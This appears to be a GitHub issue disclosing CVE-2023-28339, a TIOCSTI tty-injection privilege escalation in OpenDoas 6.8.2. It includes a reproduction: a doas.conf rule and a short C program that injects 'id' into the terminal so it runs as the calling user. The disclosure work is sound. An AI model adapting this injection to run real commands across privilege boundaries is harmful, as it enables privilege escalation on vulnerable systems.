Headline
CVE-2023-28339: security vulnerability: TIOCSTI tty character injection · Issue #106 · Duncaen/OpenDoas
OpenDoas through 6.8.2, when TIOCSTI is available, allows privilege escalation because of sharing a terminal with the original session. NOTE: TIOCSTI is unavailable in OpenBSD 6.0 and later, and can be made unavailable in the Linux kernel 6.2 and later.
I would like to confirm that OpenDoas 6.8.2 is affected. To reproduce, I did this:
$ sudo tee -a /etc/doas.conf <<<"permit nopass ${USER} as nobody # added by ${USER} on $(date -I)" $ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c #include <sys/ioctl.h>
int main(void) { const char *text = "id\n"; while (*text) ioctl(0, TIOCSTI, text++); return 0; } TIOCSTI_C_EOF $ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c $ doas -u nobody /tmp/TIOCSTI # runs id(1) as ${USER}/${DOAS_USER} rather than nobody